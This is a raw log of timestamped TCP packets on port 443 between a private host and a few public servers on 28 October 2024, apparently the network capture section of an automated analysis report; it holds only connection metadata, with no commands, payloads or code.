                                                                    Oct 28, 2024 14:03:21.810647964 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:21.812112093 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:21.812131882 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:21.812201023 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:21.814069033 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:21.814095020 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:21.814158916 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:21.814244032 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:21.814266920 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:21.814693928 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:21.814709902 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:21.825450897 CET49772443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:21.853854895 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.853878021 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.853940964 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.854542017 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.854562998 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.854619980 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.854970932 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.854979038 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.855031013 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.855398893 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.855427027 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.855488062 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.855978012 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.855990887 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.856235027 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.856245995 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.856842995 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.856853008 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.857362032 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.857387066 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.862054110 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.862075090 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.862128973 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.864576101 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:21.864592075 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:21.893887043 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:21.937159061 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.012012005 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.012027979 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.012061119 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.012070894 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.012085915 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.012094975 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.012104988 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.012128115 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.012161970 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.013251066 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013266087 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013314009 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.013319969 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013358116 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013362885 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.013386965 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.013551950 CET44349772152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013686895 CET44349772152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013742924 CET49772443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:22.013802052 CET44349772152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013839960 CET44349772152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:22.013892889 CET49772443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:22.019721031 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019783020 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019804001 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019821882 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019831896 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.019844055 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019860029 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019877911 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.019910097 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.019916058 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019932032 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.019957066 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.021785021 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.021840096 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.021857023 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.021864891 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.021907091 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.032994032 CET49767443192.168.2.4192.229.133.221
                                                                    Oct 28, 2024 14:03:22.033005953 CET44349767192.229.133.221192.168.2.4
                                                                    Oct 28, 2024 14:03:22.113353968 CET49772443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:22.113392115 CET44349772152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:22.136816025 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.136841059 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.136882067 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.136904955 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.136929989 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.136956930 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.136957884 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.136993885 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.287246943 CET49783443192.168.2.418.245.31.33
                                                                    Oct 28, 2024 14:03:22.287296057 CET4434978318.245.31.33192.168.2.4
                                                                    Oct 28, 2024 14:03:22.531065941 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:22.541100025 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:22.555082083 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:22.575139999 CET49785443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:22.585906982 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:22.590646029 CET49786443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:22.593488932 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.606250048 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:22.637522936 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.637522936 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:22.679030895 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.679084063 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.683024883 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.683109999 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.697037935 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.697148085 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.699424982 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.699444056 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.752389908 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.843096018 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.845128059 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.845153093 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.846755981 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.846828938 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.846904039 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.847604990 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:22.847698927 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.847750902 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.851035118 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.851183891 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.854235888 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.854266882 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.854473114 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.854496002 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.856736898 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.856806993 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.857260942 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.857321024 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.858323097 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.858333111 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.860380888 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.860482931 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.864572048 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.864751101 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.864912987 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.865083933 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.868022919 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.868041992 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.871160030 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.871359110 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.877535105 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.877543926 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.877582073 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.877609015 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.877630949 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.877644062 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.888716936 CET49784443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:22.919974089 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.919992924 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.919992924 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.920003891 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.955055952 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.955127954 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.955235958 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:22.955307007 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:22.955307007 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.000720978 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.000925064 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.000979900 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.001276016 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.001328945 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.001377106 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.001389027 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.001468897 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.001514912 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.005218983 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.005831957 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.005892038 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.009455919 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.009619951 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.009670973 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.011331081 CET49784443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.011338949 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.011806011 CET49784443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.011811972 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.012142897 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.012211084 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.012573957 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.012587070 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.012820959 CET49785443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.012845039 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.013227940 CET49785443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.013237000 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.013566971 CET49786443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.013581038 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.013978958 CET49786443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.013983011 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.014245033 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.014261961 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.014605045 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.014610052 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.026989937 CET49792443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.027069092 CET4434979213.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.027533054 CET49793443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.027550936 CET4434979313.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.028702021 CET49789443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.028713942 CET4434978913.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.029443026 CET49790443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.029498100 CET4434979013.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.029876947 CET49791443192.168.2.413.107.246.45
                                                                    Oct 28, 2024 14:03:23.029882908 CET4434979113.107.246.45192.168.2.4
                                                                    Oct 28, 2024 14:03:23.138237953 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.138333082 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.138394117 CET49785443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.138595104 CET49785443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.138595104 CET49785443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.138638973 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.138665915 CET4434978513.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.139013052 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.139247894 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.139293909 CET49786443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.142183065 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.142252922 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.142299891 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.144104004 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.144253969 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.144303083 CET49784443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.147159100 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.147373915 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.147432089 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.153925896 CET49786443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.153939009 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.153953075 CET49786443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.153959990 CET4434978613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.155163050 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.155181885 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.155206919 CET49787443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.155220032 CET4434978713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.156763077 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.156763077 CET49788443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.156774044 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.156785011 CET4434978813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.157919884 CET49784443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.157926083 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.157941103 CET49784443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.157947063 CET4434978413.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.164027929 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.164046049 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.164115906 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.166948080 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.167027950 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.167098999 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.167866945 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.167877913 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.167928934 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.169038057 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.169060946 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.169121027 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.169322968 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.169342995 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.169441938 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.169455051 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.170249939 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.170272112 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.170579910 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.170593023 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.172113895 CET49800443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.172147036 CET4434980013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.172194004 CET49800443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.172468901 CET49800443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.172482967 CET4434980013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.722754955 CET49802443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:23.722778082 CET44349802152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:23.722831011 CET49802443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:23.723021030 CET49802443192.168.2.4152.199.21.175
                                                                    Oct 28, 2024 14:03:23.723031998 CET44349802152.199.21.175192.168.2.4
                                                                    Oct 28, 2024 14:03:23.904283047 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.904676914 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.904900074 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.904910088 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.905616999 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.905621052 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.906013966 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.906021118 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.906608105 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.906613111 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.909522057 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.909852982 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.909883022 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.910470009 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.910481930 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.924166918 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.924499035 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.924514055 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.925365925 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.925375938 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.948514938 CET4434980013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.967097044 CET49800443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.967118025 CET4434980013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:23.967880011 CET49800443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:23.967885971 CET4434980013.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.034532070 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.034565926 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.034646988 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.034744024 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.034806967 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.034848928 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.058125019 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.058239937 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.058296919 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.058531046 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.058778048 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.059350014 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.060146093 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.060156107 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.060163975 CET49798443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.060168028 CET4434979813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.069972992 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.070003033 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.070039034 CET49799443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.070059061 CET4434979913.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.085488081 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.085494041 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.085501909 CET49796443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.085506916 CET4434979613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.087330103 CET49797443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.087344885 CET4434979713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.094235897 CET49806443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.094325066 CET4434980613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.094681978 CET49806443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.096482992 CET49807443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.096549988 CET4434980713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.096710920 CET49807443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.097716093 CET49808443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.097778082 CET4434980813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.097852945 CET49808443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.099045038 CET49806443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.099081039 CET4434980613.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.099668026 CET49807443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.099700928 CET4434980713.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.099739075 CET49808443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.099786997 CET4434980813.107.246.60192.168.2.4
                                                                    Oct 28, 2024 14:03:24.101100922 CET49809443192.168.2.413.107.246.60
                                                                    Oct 28, 2024 14:03:24.101126909 CET4434980913.107.246.60192.168.2.4
